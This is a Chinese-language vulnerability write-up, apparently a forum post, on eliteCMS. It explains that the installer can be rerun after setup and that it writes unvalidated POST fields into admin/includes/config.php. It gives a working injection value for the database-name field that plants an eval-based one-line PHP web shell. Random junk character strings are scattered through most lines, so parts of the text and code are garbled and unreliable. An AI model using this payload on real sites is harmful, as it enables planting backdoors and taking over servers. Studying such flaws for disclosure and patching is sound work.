eliteCMS的安装程序安装结束后未作锁定,导致黑客可以通过访问安装程序地址进行重复安装
$ `$ j1 N7 b' S2 D# R
7 F D& I( Y/ q) H" J另外一个漏洞是安装程序可以直接写入一句话到admin/includes/config.php1 ]" H& ]1 D8 O
我们来看代码:7 n T" @* R2 ~/ r+ A
, ?8 k2 W4 O z& w
...- X1 X* b, l6 o" h
elseif ($_GET['step'] == "4") {
6 z5 E9 D9 x( Y e {) B: \ $file = "../admin/includes/config.php";
5 \- D% X0 N$ x+ Y $write = "<?php\n";
$ ?1 e. P$ H+ F! `% i7 a5 C $write .= "/**\n";- H' U2 A2 i1 a3 e- X- }; G* C
$write .= "*\n";
! p, j r g! t $write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";( x2 _6 o, c6 G$ E- R7 t$ N7 P6 m' ^
...略...
9 S( s/ j" s0 }; n5 \ $write .= "*\n"; p4 W3 x8 ?: P& i* D1 C5 a8 x
$write .= "*/\n";7 e. S% E- c( L0 ~
$write .= "\n";
$ H1 d7 u) e" R5 Y! W/ A- X $write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";# I* U3 J# Q2 q
$write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";
% y- Q( y% v3 q% ] $write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";
1 b. B! W2 H4 j" V3 P, ? $write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";
6 i- S% y& J j" w $write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";3 L6 X* x2 ?) k9 U: g* D
$write .= "if (!\$connection) {\n";8 X ]8 }5 R& N7 a$ d
$write .= " die(\"Database connection failed\" .mysql_error());\n";
1 h' f3 q1 c6 v" L) I $write .= " \n";: U* ^. E2 P' S' T1 g8 b8 W
$write .= "} \n";+ y" K" @/ H4 x& S
$write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";
8 y& y9 k7 B/ T3 a% B8 Z+ F9 U $write .= "if (!\$db_select) {\n";8 Q9 L% N1 m4 Y t
$write .= " die(\"Database select failed\" .mysql_error());\n";
3 x& ?& ?0 p- Q1 E' Z- `" Q $write .= " \n";- q( A% K- L7 R1 o; B$ E
$write .= "} \n";
( ^- U8 f7 n; e6 T$ ?/ W $write .= "?>\n";
% T$ T; q: Q* \4 K; J& b S4 ?
8 f9 C6 J" i8 K $writer = fopen($file, 'w');; o0 J, l3 s# h, r0 U3 x
...
" H7 S6 P9 Y8 M' q! c
0 W9 Z* T4 o8 \3 \! k在看代码:
3 N7 X0 B# o0 N$ p . p' N8 t/ X1 Z3 q6 z) c
$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];1 X" H$ J+ V5 M5 w- ` T( f* o
$_SESSION['DB_NAME'] = $_POST['DB_NAME'];. i, h% Y6 l8 k- x
$_SESSION['DB_USER'] = $_POST['DB_USER'];1 O4 b4 C/ Y4 u+ D8 t
$_SESSION['DB_PASS'] = $_POST['DB_PASS'];
7 p% g$ N' ^0 e3 Z" u* a+ y7 n" b$ H
) ]1 Z7 T9 @ z) L& \取值未作任何验证8 c. a7 {9 v$ c0 @
如果将数据库名POST数据:9 |8 p9 f- T6 b7 R& e4 w/ k
: p1 z% F* x, _5 ~$ j"?><?php eval($_POST[c]);?><?php
4 J% M9 H; V. w: j 5 h+ i' Q' p3 h `% e7 g V+ k
将导致一句话后门写入/admin/includes/config.php8 G% S- J* B6 D' i5 F# }4 i
|